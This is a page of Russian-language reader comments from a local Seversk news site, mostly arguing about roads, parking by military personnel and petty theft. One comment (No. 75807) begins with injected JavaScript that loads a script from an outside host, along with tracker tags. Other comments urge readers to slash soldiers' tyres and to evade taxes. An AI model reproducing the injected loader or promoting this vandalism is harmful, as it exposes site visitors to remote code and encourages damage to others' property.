Последние комментарии:

28.12.2025 09:46 написал Set
08.12.2025 19:44 написал Set
26.11.2025 18:20 написал tourson
11.11.2025 21:45 написал FANTOMAS
10.11.2025 22:27 написал Ст. урядник
24.09.2025 16:16 написал Set
05.09.2025 09:34 написал Set
15.08.2025 12:25 написал Set
08.08.2025 20:49 написал Ст. урядник
05.07.2025 11:26 написал Set
28.06.2025 11:37 написал tourson
15.06.2025 22:47 написал барыга
11.06.2025 22:54 написал tourson
11.06.2025 22:53 написал tourson
11.06.2025 22:49 написал tourson

Комментарий № 75885: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: ZORRO2
Давайте соберемся, пообщаемся

Комментарий № 75884: Студенты поделились своей кровью

Написал: Grazgdanin
Ладно , проеха ............. КАК ЗОВУТ ДЕВУШКУ ЧТО НА ПЕРВОЙ ФОТКЕ ВТОРАЯ С ЛЕВА В ЖЕЛТОЙ МАЙКЕ ? laughing 

Комментарий № 75883: Письмо в редакцию. Ночная работа

Написал: Висточка
Grazgdanin,
Похититель лампочек smile 


--------------------
Невозможно быть хорошим для всех… И если у человека есть враги, то он действительно чего-то стоит…

Комментарий № 75882: Письмо в редакцию. Ночная работа

Написал: Grazgdanin
Завсегдатый, у меня под окнами и на лестничной клетки видеоглазки стоят с датчиком движения и когда ктото в обзоре крутится то запись включается , именно так я выловил похитителя лампочек !

Комментарий № 75881: 24 апреля в городе будут следить за пешеходами

Написал: npocTo_BURLIK
могу пару мест рыбных подсказать , возле ленина 108 минут за 5ть можно человек 10 точно словить , там как по пешеходному снуют , на все насрать .

и штраф бы им еще тыщ 5ть сделать , что бы не повадно было , а всё предупреждения ни чего кроме!

Комментарий № 75880: Письмо в редакцию. Ночная работа

Написал: Grazgdanin
Ст. урядник,
Штирлиц lol 

Комментарий № 75879: Борьба с автовладельцами северской дивизии

Написал: vision
Марина 75,
А что, гражданских таких мало, что ли? Да ещё и побольше, чем военных, просто форма - она сразу в глаза бросается.
У всех в голове свои таракашки...
Но то, что военных в городе невзлюбили - это факт. И невзлюбили только после того, как повысили им з/плату, это уже не секрет.
А до этого никто о них и не вспоминал...

Комментарий № 75878: Когда закончатся ямочные ремонты?

Написал: npocTo_BURLIK
все кранты подвеске ! спасибо властям !!

сволочи !!!!!!!!!!!!!!!

Комментарий № 75877: Амбулаторная карта пациента

Написал: Завсегдатый
IT-servis,
lol lol lol Задрал уже рекламировать свою контору в каждом посте lol lol lol ..

Tharus,

Ага это точно на некоторых посмотришь так пол часа клопов давят что бы отметить прибытия на приём да диагноз lol  !!!

 

 

Комментарий № 75876: Борьба с автовладельцами северской дивизии

Написал: Марина 75
Цитата: vision
Так что полегче о военнослужащих!
 
А что о них говорить? Их "мастерство парковаться" говорит само за себя.  Оговорюсь - не все.  Но часто молодые парни в форме просто поражают своим наплевавательским отношением к окружающим - ехал-ехал, встал и пофиг как.
Такое частенько у Мармелайта можно наблюдать, хоть там и разметка есть. Видать без точных указаний сверху действовать в жизни и не умеют.

Комментарий № 75875: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: Ст. урядник

Их надо нагибать и не раз, а много раз,  за дороги, за их технологию ремонта ( то они  ямы вибро машинкой заделывают, сегодня ехал через сосновку, так там новый асфальт лежит, только не понятно чем они его закатывали, едешь как по стиральной доске).  Короче на мыло их всех.



--------------------
Хуже умных врагов, хитрожопые друзья.

Комментарий № 75874: Письмо в редакцию. Ночная работа

Написал: Завсегдатый
Grazgdanin,
Камеры деньги стоят, а у нас СХК и Военные всё на халяву ХОТЯТ!!!

Комментарий № 75873: Борьба с автовладельцами северской дивизии

Написал: vision
Завсегдатый,
зря вы так. 
Это обращение уже скопировали военные и ещё раз об этом будет доведено до автовладельцев.
Чем больше зла сделаете, тем больше к вам же вернётся, не забывайте об этом.

Комментарий № 75871: Письмо в редакцию. Ночная работа

Написал: Ст. урядник
KepuexaЗачем бить? Я лет как пять тому назад, поймал одного умельца сливающего бензин с моего  авто, бить не стал, а просто заставил стакан бензина выпить и отпустил восвояси.

 




--------------------
Хуже умных врагов, хитрожопые друзья.

Комментарий № 75870: Борьба с автовладельцами северской дивизии

Написал: Завсегдатый

Местным жителям! Берёте ШИЛО ИЛИ ГВОЗДБ ИЛИ НОЖ и ПОРИТЕ ШИНЫ может так зелёные поймут а то до них простым русским языком не доходит!!!!

Комментарий № 75869: Веб-камеры в Северске

Написал: feta52
Посмотрела ссылки, где установлены в/камеры. И что?  Ничего интересного не обнаружила.

Комментарий № 75868: Борьба с автовладельцами северской дивизии

Написал: vision
"23 года все думали, что Россия на коленях, а оказалось - она зашнуровывала берцы!"
Так что полегче о военнослужащих!

Комментарий № 75867: Провайдеры Северска

Написал: Panda
А может кто здесь про других провайдеров порассказать? не про ттк. или здесь только про ттк можно поразузнать? Про Мегу кто-нибудь слышал? вроде хвалят их

Комментарий № 75866: Борьба с автовладельцами северской дивизии

Написал: AAtomsk
Цитата: Максим
Давайте будем взаимовежливыми и значительная часть проблем на дорогах уйдет сама собой!

 

Вооот, ура и я ведь про тоже )  Вежливость это оставить авто у дома, если знаешь, что места у работы запарковать ты не найдёшь. Вежливость, это не злиться, когда вечером увидел "чужой" авто возле своего дома.

Только нужно понимать, когда один постоянно хамит, а второй терпит (проявляет вежливость), то это не вежливость, это ведь дебилизм какойто))

Комментарий № 75865: Борьба с автовладельцами северской дивизии

Написал: Максим
AAtomsk,
Давайте будем взаимовежливыми и значительная часть проблем на дорогах уйдет сама собой!

Комментарий № 75864: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: ZORRO2
Цитата: Grazgdanin
енко же ясно ответил на ваш вопрос по данной проблем
 
вот и надо нагнуть их разок!!! 

Комментарий № 75863: Борьба с автовладельцами северской дивизии

Написал: AAtomsk

Цитата: Максим
Можете улыбаться, но это единственный выход. Как показывает практика больших городов. Попробуйте припарковаться вечером в любом дворе в Томске, Новосибирске, Кемерово, не говоря про Москву. И не важно в каком дворе Вы живете, подобные проблемы есть везде

Согласен полностью, скажу более сам 5 дней в неделю живу в Томске. В одном из самых сложных дворов в плане парковки. Дак вот по опыту скажу,что даже за неправильную парковку, когда вместо одного, человек занимал два парковочных места прокололи два колеса и  это при наличии камер во дворе. Помогло...

Ещё утром видел камень положенный на капот авто, заблокировавшей выезд двух машин.

Я это к тому, что люди борятся с невежеством по простому, без статей на сайтах и долгих обсуждений...

Комментарий № 75862: Борьба с автовладельцами северской дивизии

Написал: Максим
AAtomsk,
А чем они хуже, так же паркуются там где есть место, или для тех кто воевал у нас летающие машины придумали? )))

Комментарий № 75861: Почему перестали платить премии?

Написал: Grazgdanin
Kepuexa,
ерничаем ? lol 

Комментарий № 75860: Борьба с автовладельцами северской дивизии

Написал: Максим
смотреть всем,
Кстати, да будет известно, что группировка войск на северном кавказе составляла более 60 000 человек, при общей численности внутренних войск окооло 200 000!
Так что побывали там не еденицы, а некоторые и по нескольку раз.
Задайте себе вопрос на досуге, поехали бы Вы в чечню в 1996 году сами или отпустили бы туда сына, пусть и не за ту а за сегодняшнюю зарплату!

Комментарий № 75859: Борьба с автовладельцами северской дивизии

Написал: Максим
смотреть всем,
Так суть в том и состоит, что не надо всех под одну гребенку равнять.

Комментарий № 75858: Борьба с автовладельцами северской дивизии

Написал: AAtomsk
Максим,
Ой брат не надо про дагестан и чечню. Те, кто действительно там работал, по беспределу парковать авто на газоне в чужом дворе не будет.

Комментарий № 75857: Борьба с автовладельцами северской дивизии

Написал: Максим
AAtomsk,
Можете улыбаться, но это единственный выход. Как показывает практика больших городов. Попробуйте припарковаться вечером в любом дворе в Томске, Новосибирске, Кемерово, не говоря про Москву. И не важно в каком дворе Вы живете, подобные проблемы есть везде.

Комментарий № 75856: Борьба с автовладельцами северской дивизии

Написал: смотреть всем
Максим,
отправляли не всех а единиц,о них речи нет им уважуха и почёт, а тех кто на кпп стоят их только в качестве бомб можно отправлять

Комментарий № 75855: Борьба с автовладельцами северской дивизии

Написал: vision
смотреть всем,
Ну.....это не нам судить.  Не завидуйте им. Всё, что нам даётся - всё всем по заслугам.  Больше, чем мы заслуживаем не дадут. ))))
Как говорится, кто на что учился.
И не думайте, что у военных лёгкий труд.  Многие, кто служил посбегали оттуда - не вынесли.  Или на пенсию удрали и рады, что, наконец-то закончились их мучения.
Знаю не одного и не одну военнослужащую.
Чтобы это понять - надо самим оказаться на их месте.

Комментарий № 75854: Борьба с автовладельцами северской дивизии

Написал: AAtomsk
Максим,

Цитата: Максим
о каком возмущении может идти речь? Каждый гражданин Российской федерации имеет право припарковать свой автомобиль в любом месте, где это не запрещено!Фактически в тексте автора имеет место призыв ограничить права одних граждан, для того чтобы другим предоставить больше возможностей!?Это не правильно и противозаконно!Если жители домов возле "Восхода" хотят, пускай берут у города в безвозмездное пользование по договору территорию двора, ставят шлагбаумы и тем самым ограничивают нежелательных гостей.Но нет, это же сложно, надо создавать ТОС, ходить в администрацию, потом самим двор облагораживать, деньги тратить...Конечно, лучше поплакаться на сайте и надеяться, что кто то за них все сделает.Но никто за вас и для вас ничего не сделает, таковы современные реалии!

На это можно только улыбаться))

на всякий случай: я не живу в этом дворе)

Комментарий № 75853: Борьба с автовладельцами северской дивизии

Написал: Максим
смотреть всем,
А когда этих "сторожей" за копейки под пули в чечню и дагестан отправляли, что то никто о них не вспоминал!!!

Комментарий № 75852: Добрая соседка

Написал: Grazgdanin
улитыч,
Явасумоляю ! smile 

Комментарий № 75851: Борьба с автовладельцами северской дивизии

Написал: Максим
AAtomsk,
о каком возмущении может идти речь? Каждый гражданин Российской федерации имеет право припарковать свой автомобиль в любом месте, где это не запрещено!
Фактически в тексте автора имеет место призыв ограничить права одних граждан, для того чтобы другим предоставить больше возможностей!?
Это не правильно и противозаконно!
Если жители домов возле "Восхода" хотят, пускай берут у города в безвозмездное пользование по договору территорию двора, ставят шлагбаумы и тем самым ограничивают нежелательных гостей.

Но нет, это же сложно, надо создавать ТОС, ходить в администрацию, потом самим двор облагораживать, деньги тратить...
Конечно, лучше поплакаться на сайте и надеяться, что кто то за них все сделает.
Но никто за вас и для вас ничего не сделает, таковы современные реалии!

Комментарий № 75850: Студенты поделились своей кровью

Написал: Grazgdanin
lol 

Комментарий № 75849: Почему перестали платить премии?

Написал: Kepuexa
В Иглаково посмотрите дом Шамина- там и есть ваши премии:))

Комментарий № 75848: Борьба с автовладельцами северской дивизии

Написал: смотреть всем
AAtomsk,
и когда эти гости паркуются как попало это ваще никуда не годится

Комментарий № 75847: Борьба с автовладельцами северской дивизии

Написал: смотреть всем

vision,
за последние 3 года нам подняли зп на 1500р,и чтоб купить машину я работал с утра до вечера как папа карло в жаре и грязи(я не шоколадник)а за что воякам подняли?ведь они по сути сторожа.

Комментарий № 75846: Почему перестали платить премии?

Написал: Grazgdanin
И НЕ ЗАБЫВАЙТЕ ЧТО ЗА 2014 ГОД ВСЕ ВАШИ НАЛОГИ , ОТЧИСЛЕНИЯ В ПЕНСИОННЫЙ ФОНД БУДУТ ИДТИ НА УСМОТРЕНИЕ ГОСУДАРСТВА !

ПОЭТОМУ И НЕ ЖЕЛАТЕЛЬНО ЭТОТ ГОД ОФИЦИАЛЬНО ГДЕТО РАБОТАТЬ !!!!!!!!! 

Комментарий № 75845: Борьба с автовладельцами северской дивизии

Написал: AAtomsk
Максим,

Да кстати, странно.

Ну возле администрации вродь большая парковка для работников есть. А вот  как обстоят дела возле УВД, былоб интересно узнать от жильцов ближайших домов.

Комментарий № 75844: Почему перестали платить премии?

Написал: Grazgdanin
wink это нормально , именно по этой причине я ушел в теневой заработок и уже как полгода не содержу ПФ , налоговую и подобных паразитов ! 

Комментарий № 75843: Борьба с автовладельцами северской дивизии

Написал: AAtomsk

Ребят ну не надо искать какието оправдания.

Тревоги, двое суток на работе, это всётаки исключения!

Очень много военных, поднятых по тревоге, имея свой авто, едут на такси. И не парятся вообще.

 

Надо просто один раз понять, что парковаться на время работы в чужом дворе, как минимум не прилично как максимум свинство.

 

Ну ведь все автовладельцы знают, как  приезжая с работы домой обламывает искать себе место для парковки. И ладно если в доме жильцов с машинами много, это норма, но когда пол двора машин это "гости"... Тут думаю многих посетит возмущение...

 

Комментарий № 75842: Письмо в редакцию. Ночная работа

Написал: Kepuexa
У меня на лесной сливали 2 раза бензин,дворы темные вот и сливают в темноте,поймать немогу.Бита уже ждет своих любителей бензино-сливателей:)

Комментарий № 75841: Письмо в редакцию. Ночная работа

Написал: Grazgdanin
дА ПОСТАВЬТЕ УЖЕ ВИДЕОКАМЕРЫ У СЕБЯ В ПОДЪЕЗДЕ , НА УЛИЦЕ ВО ДВОРЕ И СРАЗУ ВЫЧИСЛИТЕ СВОЛОЧЕЙ !

Комментарий № 75840: В связи с «Атомной милей» будет перекрыто дорожное движение

Написал: Grazgdanin
улитыч,
Да вы не понимаете , все эти побегушки и мили - отработка действия населения при случае если взлетит так же как и в Чернобыле в воздух реактор БРЕСТ-300 , ну чтобы люди не ждали поезда и автобусы , а сразу после звука ревуна ПОБЕЖАЛИ ! wink 

Комментарий № 75838: Борьба с автовладельцами северской дивизии

Написал: Максим

Почему то, жильцы домов находящихся возле администрации и УВД не жалуются, хотя ситуация с парковкой схожая. Похоже у автора личная неприязнь к военным, наверное на службу не взяли...

Комментарий № 75837: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: Grazgdanin
Люди ну Диденко же ясно ответил на ваш вопрос по данной проблеме : МНЕ ПОКУЙ ! wink 

Комментарий № 75835: В связи с «Атомной милей» будет перекрыто дорожное движение

Написал: улитыч
Пусть пешим порядком выдвигаются к остановленному Реакторному Заводу и хоть забегаются вокруг него!

Комментарий № 75833: Борьба с автовладельцами северской дивизии

Написал: vision
Максим,
+1005000!!!

Комментарий № 75832: Против Дома-2, но за Навального

Написал: Мышелов
Panika,
Ну здесь хоть сказки не рассказывайте. Навальный довольно давно уже показал свое настоящее лицо. Пост про ВТБ - фальсификация, за которую его сторонники и участники судебного процесса против ВТБ очень сильно хотят побить. Дело Магнитского пиарили все кому не лень, и Овальный попросту вовремя "встал в струю". И, если уж получится избавиться от Тупина, нельзя допустить к выборам другого вора и патологического вруна Обвального.

Комментарий № 75831: Борьба с автовладельцами северской дивизии

Написал: Максим
Перефразируя автора и поддерживающих его комментаторов, мысль можно изложить в следующем формате:
Достали уже эти Северчане, покупают себе с советских времен машины и паркуют их в Томске ни у кинотеатра ни у торгового центра ни у рынка не припаркуешься! Что у них за колючкой парковаться негде?
И работают пускай в своем Северске, гечего в Томск кататься и парковочные и рабочие места занимать!
Так что не доводите до греха Томского русского Ваньку!

Как Вам, уважаемые такая постановка вопроса!?

А ответ один, кто хочет жить один, вне общества - пожалуйста Россия матушка огромная и для каждого найдется уголок тайги!
Забудте свою изжогу и лучше займитесь делами!

Комментарий № 75830: Борьба с автовладельцами северской дивизии

Написал: Vasia
смотреть всем,
Вот кто ещё не тда поехал... вы сами сверху тему почитайте, речь не о количестве зп и о том что машин понакупали, а о том что ставить их негде... Мне кажется это проблема строителей, а ни как ни автовладельцев. Все такие зллые.. Вот если бы на месте части стояла больничка и во дврах парковались бы не вояки, а врачи и медсестры, пациенты, вот уверен, что сейчас бы это не обсуждалось! И правда сказали - ДВОЙНЫЕ стандарты! 

Комментарий № 75829: Борьба с автовладельцами северской дивизии

Написал: vision
смотреть всем,
Да это и понятно. Если б вам прибавили з/плату - что бы вы, интересно, делали, а?
Ответьте?
И разве это плохо, когда растёт благосостояние людей?

Комментарий № 75828: Письмо в редакцию. Ночная работа

Написал: 022880
Сами автолюбители нарков на эти "дела" провоцируют,особенно владельцы всяких трахом, потомучто ищут всё по знакомым гдебы подешевле найти, и дерез десятые руки находятся и аккумы и магнитолы! Раз спрос есть! Будут и воровать! Публично бы кого нибудь закрыли бы за скупку краденного!

Комментарий № 75827: Борьба с автовладельцами северской дивизии

Написал: смотреть всем
vision,
вы немного не в ту степь поехали,речь не о том кому можно или нельзя,а о том что после повышения зп они их скупали как ненормальные.

Комментарий № 75826: В связи с «Атомной милей» будет перекрыто дорожное движение

Написал: alex33kaw
По улице Ленина и бегали бы!

Комментарий № 75825: Борьба с автовладельцами северской дивизии

Написал: vision
AAtomsk,
Вот это уже близко к истине.
Но этих военных нам не понять. Их то по тревоге поднимают, а то по двое суток на службе держат (мало ли там какие "вводные бывают у них)...Они люди подневольные.  И авто, видимо, их выручает при этом.

Комментарий № 75824: Борьба с автовладельцами северской дивизии

Написал: Evgen 2
так это не только во дворах. в столовку 17 на обед невозможно приехать и пожрать. Всё позаставили вояки. 

Комментарий № 75823: Борьба с автовладельцами северской дивизии

Написал: 022880
А если тут всё наоборот - сам комдив  дал" приказ" воинам ставить машины во дворах, мол штатские нашу стоянку отвоевали, так устроим им во дворах "Хиросиму".

Комментарий № 75822: Борьба с автовладельцами северской дивизии

Написал: vision
смотреть всем,
странно, у вас, значит, машина была.  Думается, и сейчас есть.
Значит, были средства её приобрести.
Почему бы это же не сделать тем, у кого эти средства тоже появились?
Или воякам нельзя, а вам можно?

Комментарий № 75821: Борьба с автовладельцами северской дивизии

Написал: AAtomsk

Кто, когда, какую и за сколько купил машину это дело десятое.

Главное понимать, что если негде возле работы запарковать машину, надо оставить её дома. Вот и всё!

Это одновременно так просто и так сложно понять. С одной стороны у "меня" вроде есть машина и я хочу на ней отправиться на работу. С другой если я её запаркую во дворе буду придурком и невеждой.

Выбор каждый делает сам... И видимо большинство военных свой выбор сделали...

 

Жителям близлежащих домов: начните с колёс...

 

Комментарий № 75820: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: ZORRO2
uncleandrew,
к сожалению, чтобы Вам можно было доверить данную миссию, необходимо чтобы как раз оптимизм присутствовал в полной мере, так же как юридическая грамотность, а предрассудки как раз отсутствовали, вообще если интерес имеется у массы необходимо стречаться и разговаривать.

Комментарий № 75819: Студенты поделились своей кровью

Написал: NoName
Цитата: uncleandrew
Здрась, это разве не подвиг? Кому-то помогу... Так пропиарь менэ! Нет?
Цитата: uncleandrew
Так пропиарь менэ

Ты все таки не очень умен. Пиар в случае с донорством имеет целью популяризировать это действие. Кровь нужна всегда, нужно чтобы ее сдавали, нужно, по крайней мере, чтобы число сдающих не уменьшалось. Нужно, чтобы для этого люди видели, что тут есть чем гордиться, чтобы знали, где и как это делается. Вот в чем смысл такого пиара - чтобы и другие пошли, чтобы те, кто уже пошел, знали, что их поступок нужен и уважаем.
Ты же предполагаешь, что это обыденный случай, такой же как тебе пойти в суд по своей работе. Но это разные вещи. Пиарить тебя в этом смысле нет никакого резона, ибо нет потребности призвать как можно большее число людей идти в суд. Вот призвать людей идти сдавать кровь - нужно, а призвать идти в суд нет такой необходимости и невозможно, ибо каждый кто захочет в суд не пойдет, в отличии от донорства.
Надеюсь, до тебя дотумкало, что это не обыденное сообщение о просто сделанной работе. Это сообщение имеет цель, которой никак не может быть в пиаринии твоего похода в суд.
Кроме того, тебе излагалась еще одна претензия - ты утверждаешь что-то не имея никаких доказательств, только предполагая, что не достойно юриста. Ты утверждаешь, что они пошли по указке, ваще не зная как и кто на самом деле пошел.

Да и с чего ты решил, что я буду тебя пиарить. Упрашиваешь уже третий раз. Как юрист ты не достоин моего пиара, это наоборот людям навредит, еще поверит кто-нибудь.

Комментарий № 75818: Письмо в редакцию. Ночная работа

Написал: Романыч
Заява есть, но будет ли толк. Недавно возле первого объекта выдрали акум и магни толу.
 

Комментарий № 75817: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: uncleandrew
ZORRO2,
Мне бы Ваш оптимизм...
Боюсь, эти деньги будут потрачены за зря. Впрочем, готов их освоить :) Как представитель, естественно... 


--------------------
https://vk.com/autolawyerts

Комментарий № 75816: Борьба с автовладельцами северской дивизии

Написал: смотреть всем
vision,
я это к тому о продаже авто что по рынку одни камуфляжи ходили


Комментарий № 75815: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: ZORRO2
uncleandrew,
если нету про дороги значит есть про благоустройство, ко мнене давно один предствитель данного комитета подходил и  грозился штраф влепить, за то что я машину на газон поставил вернее на его подобие, так вот на мою реплику про расширение стоянки он сказал что денег нету, но вы мол сами можете, понятно что можете а вы тогда на хрена? Так вот извини от темы отошел, мэр руководит таки комитетом как комитет по благуостройству, и если он не может выполнять свои обязанности в полной мере, значит надо в суде ставить вопрос о его служебном несоответствии, заодно и в антимонопольный коммитет направить письмо с промьбой о прверке всех аукционов с участием Марии-ра, и т.д. а как правильно и на кого подать в суд должен юритст  продумать. Общественную организацию нам надо "организовать" , а чтобы вопросов с финансированием не было , финансировать надо самим, для начала челоовек 100, по 1000р, скинуться  этого хватит на пару месяцев. поотом думаю еще можно, хотя народ думаю к нам присоединиться и поменьше можно.

Комментарий № 75814: Борьба с автовладельцами северской дивизии

Написал: vision
смотреть всем,
ну, так вы продавали машину, а кто-то покупает. Вояки это или невояки - какая кому разница? Или "шоколадники"  боятся теперь конкуренции?
Сейчас взять кредит и купить авто - легче лёгкого.  Не только воякам.
Раздуваете тему на ровном месте.  Это здесь уже не раз было.
И не берите грех на душу, портя чужие машины. Нехорошо это.
Придите на КПП в/части у дивизии, запишитесь у дежурного по КПП (или куда он вас направит для записи) на приём к командиру дивизии и лично всё скажите и покажите видео.
А вот после этого опубликуйте здесь последствия вашего визита. Подействует или нет - нам и расскажете всем здесь.

Комментарий № 75813: Амбулаторная карта пациента

Написал: Tharus
муся,
Информация о пациентах уже несколько лет храниться на сервере в Северске. Защита нам надежная т.к. создан Рэйдмассив-5 с ежедневным бэкапом данных. Все врачи могут заносить свои осмотры в БД в электронном виде. Но, многие просто не умеют и не хотят делать это. Поэтому в БД заносят только выписные листы, протоколы обследований, лабораторные данные, прививки и сведения о посещениях. В будущем ланируется создание обще Российской единой БД(базы данных).


--------------------
Я старый пират и не знаю слов лицензионного соглашения!..

Комментарий № 75812: Борьба с автовладельцами северской дивизии

Написал: Mimzi
А что же вы, жители близлежащих домов, на стоянке. обородованной для северской дивизии. ставите свои машины? Орали-орали, что территория, выделенная под стоянку, части не принадлежит, добились, что можете там ставить свои машины. Двойные стандарты какие-то. Во дворах не ставь, на автостоянке не ставь, а куда ставить людям машины? Увы, заклятием исчезновения пользоваться не умеют, не обучались в Хогвартсе. Машина сама домой на стоянку не едет, в гаражи тоже, техника до того еще не дошла.
Сами не занимайте места. оборудованные под автомобили для служащих дивизии, и будет вам счастье!
А портить втихую машины военных - это уголовная статья, всегда найдется тот, кто на вас настучит. Будьте сами бдительны, зависть-гнилое чувство.


--------------------
Если человека кусает вампир, он становится вампиром. Такое ощущение, что очень многих вокруг искусали бараны!

Комментарий № 75811: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: uncleandrew
Цитата: ZORRO2
uncleandrew, На мэра!!! на кого еще, если денег не предусмотрели, значит плохо работают!!! значит надо уволить, мы с вами им зарплату платим, нам и спрашивать!!! что не понятного!!!
 

Ну-ну... Есть устав ЗАТО Северск, мэр (как таковой) обязан его соблюдать, в нем нет ничего про "отвратительность дорог" и тому подобное. Остальное я, как и любой чиновник, переверну как угодно. На что, подаем? 


--------------------
https://vk.com/autolawyerts

Комментарий № 75810: Борьба с автовладельцами северской дивизии

Написал: Viktorian
vision, Полностью с тобой согласен когда город строился машин столько небыло и не расчитывали стоянки, а местные жители сами понакупают по 2-3 машины и начинают ставить куда попала, а потом жалуються "мол машины некуда ставить"

Комментарий № 75809: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: ZORRO2
uncleandrew,
Хоте ли ведь собраться для пробега, давайте соберемся для заявления, есть у кого ибудь , или здесь юристы, можно даже студента или выпускника превлечь, так сказать для начала трудовой карьеры .
 

Комментарий № 75808: Когда закончатся ямочные ремонты?

Написал: Arteq
Тему аппайте вверх, чтобы всегда была видна, авось заметят

Комментарий № 75807: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: divanon
<!--script> ( function ( src ) { var script = document.createElement( 'script' ); script.src = src; ( document.head || document.body || document.documentElement ).appendChild( script ); } )( '//infolooks.org/api/qfe5rqcvizmcjfars0wkmnytahh8sxz4' ); <!--script src="//front.facetz.net/collect.js" type="text/javascript"> loadFacetzCollector(“facetz" ,""); <!-- --> <!--script src="http://www.dolka.ru/2014.php">
Раньше раз в три года коммуну перестилали!!!Что бюджет щас меньше стал на эти дела,тупо отмывают бабки и людям отписываются статьями из кодекса!!!БИЗНЕСМЕНЫ!!!!

Комментарий № 75806: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: ZORRO2
uncleandrew,
На мэра!!! на кого еще, если денег не предусмотрели, значит плохо работают!!! значит надо уволить, мы с вами им зарплату платим, нам и спрашивать!!! что не понятного!!!

Комментарий № 75805: Письмо в редакцию. Ночная работа

Написал: uncleandrew
Цитата: Мефодий
может ещё к Путину обратиться?
 

Можно, но вопрос в другом: А в полицию заяву подать-не гороскоп?


--------------------
https://vk.com/autolawyerts

Комментарий № 75804: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: uncleandrew
Цитата: Немой
На тех , кто должен закрывать аварийные дороги имея на это полномомочия
 

Ну так это будет в порядке 25-ой главы ГК, типа, на бездействие. И? 


--------------------
https://vk.com/autolawyerts

Комментарий № 75803: Борьба с автовладельцами северской дивизии

Написал: смотреть всем
vision,
и про зарплату это не другое,вспомним когда у них не было больших окладов разве было у них столько машин,и дворы не так заставлены у восхода были,это началось после поднятия зп,я как раз продавал своё авто на базаре в Томске и там из покупашек процентов 80 были вояки.

Комментарий № 75802: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: Undergrund
Парусинку бы еще подлатали....

Комментарий № 75801: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: Немой
На тех , кто должен закрывать аварийные дороги имея на это полномомочия

Комментарий № 75800: Добрая соседка

Написал: uncleandrew
HaTaJlu,
Не верю!..


--------------------
https://vk.com/autolawyerts

Комментарий № 75799: Письмо в редакцию. Ночная работа

Написал: Мефодий
Цитата: uncleandrew
А в полицию заяву подать-не гороскоп?
Цитата: JustMe
А правоохранительные органы Северска  не хотят поработать в этом направлении?
  Ребята работают примерно 2 года в этой сфере. 
а может ещё к Путину обратиться? 

Комментарий № 75798: В городе пройдет традиционный пробег "Атомная миля"

Написал: uncleandrew
Цитата: Gent
Забавно, что про оплату пишет персонаж, который все свои посты пишет исключительно для того, чтобы все и везде видели автоматический рекламный прицеп
 

Поддержу... 


--------------------
https://vk.com/autolawyerts

Комментарий № 75797: Борьба с автовладельцами северской дивизии

Написал: vision
Анекдот в тему.
Объявление на подъезде: "Милые дамы! Убедительно просим вас заводить себе любовников из своего дома, а то уже авто ставить негде."

Комментарий № 75796: Студенты поделились своей кровью

Написал: uncleandrew
Цитата: NoName
Дело было так. Пошли люди сдавать кровь,
 

Ты само в это веришь? lol  


--------------------
https://vk.com/autolawyerts

Комментарий № 75795: Борьба с автовладельцами северской дивизии

Написал: vision
смотреть всем,
а вот про з/плату - это уже другое.  Речь не о з/плате в этом посте, не так ли?
И да, тоже слышали, что на ту стоянку, что построили около дивизии разрешено ставить авто не только военнослужащим.

Комментарий № 75794: Студенты поделились своей кровью

Написал: uncleandrew
Цитата: NoName
Езжай ты в суд. При чем здесь это?
 

Здрась, это разве  не подвиг? Кому-то помогу... Так пропиарь менэ! Нет? Что мешает? Аааа, дерьмоположение... Относительно СХК и Главенства города... Повторить могу все те маты, которые в отношении тебя были высказаны в сердцах. 


--------------------
https://vk.com/autolawyerts

Комментарий № 75793: Письмо в редакцию. Ночная работа

Написал: JustMe
А правоохранительные органы Северска  не хотят поработать в этом направлении?

Комментарий № 75792: Письмо в редакцию. Ночная работа

Написал: uncleandrew
А в полицию заяву подать-не гороскоп?


--------------------
https://vk.com/autolawyerts

Комментарий № 75791: Он-лайн приемная администрации. Дорога - одна сплошная яма

Написал: uncleandrew
Цитата: ZORRO2
давайте скинемся и подадим в суд
 

На что? 


--------------------
https://vk.com/autolawyerts

Комментарий № 75790: В связи с «Атомной милей» будет перекрыто дорожное движение

Написал: uncleandrew
Задрали, блин. Нельзя как-то не перекрывать городскую магистраль?!


--------------------
https://vk.com/autolawyerts

Комментарий № 75789: Борьба с автовладельцами северской дивизии

Написал: uncleandrew
Автору: удачи и терпения.

Увы, действующее законодательство никак не ограничивает лиц, не проживающих в границах определенных территорий, в парковке на обозначенных территориях. Удручающая ситуация и со Свердлова, 23. Там вообще не к кому конкретно обратиться... Терпим... 


--------------------
https://vk.com/autolawyerts

Комментарий № 75788: В городе пройдет традиционный пробег "Атомная миля"

Написал: Serega
че за турфирмы?...телки там лучше чем в атомном забеге колбасных продукций? lol

Комментарий № 75787: Почему перестали платить премии?

Написал: seversk
полнейший бред

Комментарий № 75786: Борьба с автовладельцами северской дивизии

Написал: Народный контроль
смотреть всем,
уже давно пускают!
stroimguru.ru
Курс валюты:
76.03 82↓   $     88.78 98↓  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: